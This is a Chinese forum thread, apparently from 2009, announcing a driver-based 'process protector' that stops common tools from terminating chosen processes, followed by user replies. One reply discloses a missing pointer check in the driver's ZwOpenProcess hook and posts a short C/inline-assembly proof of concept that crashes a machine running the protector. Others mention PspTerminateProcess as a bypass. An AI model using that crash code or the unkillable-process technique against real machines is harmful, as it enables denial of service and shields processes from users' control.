IT情深进程保护器(驱动方式)

英仔

进程保护器,简单进程保护演示（驱动方式） ，非注入方式，装了主动防御和驱动防火墙的用户可能无法正常使用
简介：
1.选好要保护的进程后单击保护，即可退出本程序，
2.保护其它进程时不用本程序在后台运行，程序不驻留内存，不占系统资源,
3.能过大部分常规进程管理器，当然也有能结束的，名字我就不列出来了，对我不利嘛，呵呵，毕竟进程保护永远只能是相对的，没有绝对不能结束的，像未公开NTAPI PspTerminateProcess在结束进程上基本上是万能的。
4.测试过无法结束的进程工具有:WINDOWS优化大师的进程管理器，WINDOWS任务管理器，微软的进程利器ProcessExplorer,系统自带的强力进程调试工具ntsd，CMD结束进程命令：taskkill,其它的自己去试吧,
5.本程序能做到无进程保护任意进程（不限进程个数），采用驱动方式实现，不占用系统资源，能满足常规进程保护要求，
小玩意，驱动高手就不要笑话了,(PS:在进程列表框中可按住CTRL或SHIFT进行批量操作，
[注明：本驱动只拦截对指定保护进程的强制结束方式，保证被保护进程不被非法关闭，并没有处理WM_CLOSE消息，如果要保护的是一个窗口程序，通过点击窗口关闭按钮是可以正常关闭的，通过SendMessage,PostMessage，FindWindow也是可以关闭的[好像消息关闭模式有时也不能关闭，因为无法打开被保护的进程,无法得到我保护的进程的句柄]，其实要处理这些消息也是很容易的，想知道内核驱动工作的情况，可以下载一个微软内核调试查看器Dbgview.exe在驱动运行时打开即可查看到工作状态.下载地址：http://www.microsoft.com/taiwan/ ... eous/DebugView.mspx)
[《迅雷》专用高速下载通道]
[《快车》专用高速下载通道]
【江苏常州】【电信下载地址】
电信下载地址#153
【茂名电信下载地址】
【海波 - 江苏电信下载地址】
【群英网络 - 电信下载地址】
【广东中山】【网通】
【媒迪雅IDC】【网通】【浙江金华下载地址】
【电信#119】【只供迅雷抓取用】

小v可

不错哦！

Mahone

倒，用delphi DDK写的驱动

Mahone

只是hook了ZwOpenProcess，起码有10种方法可以结束掉被保护的进程。

Mahone

hook的ZwOpenProcess函数存在一个严重的BSOD漏洞，起因是未对CLIENT_ID指针做有效性验证

运行进程保护器之后随便保护一个进程，然后使用下面这段代码可以立刻蓝屏，造成拒绝服务攻击。

1. #include "windows.h"
   
2. 
   
3. PVOID p = NULL;
   
4. HMODULE hMod;
   
5. 
   
6. void main()
   
7. {
   
8. hMod = LoadLibrary("NTDLL.DLL");
   
9. p = GetProcAddress(hMod,"ZwOpenProcess");
   
10. _asm
    
11. {
    
12. push 0xFFFFFFFF
    
13. push 0xFFFFFFFF
    
14. push 0
    
15. push 0xFFFFFFFF
    
16. call p
    
17. }
    
18. }

复制代码

希望作者能够修补此漏洞，谢谢！

fkrs10

似乎是好东东，只是不明白这个平时用在什么方面？

angel13th

“PspTerminateProcess在结束进程上基本上是万能的”

这个函数是不是现在已经被用烂了？看来这个软件防不住任何一个R0的进程管理软件。。。
不过也正常。。。

Mahone

原帖由 angel13th 于 2009-4-12 22:39 发表
“PspTerminateProcess在结束进程上基本上是万能的”

这个函数是不是现在已经被用烂了？看来这个软件防不住任何一个R0的进程管理软件。。。
不过也正常。。。

不说ring0，ring3都有很多种方法结束掉它

dl123100

果然不行

bjkk988

下载了，学习了。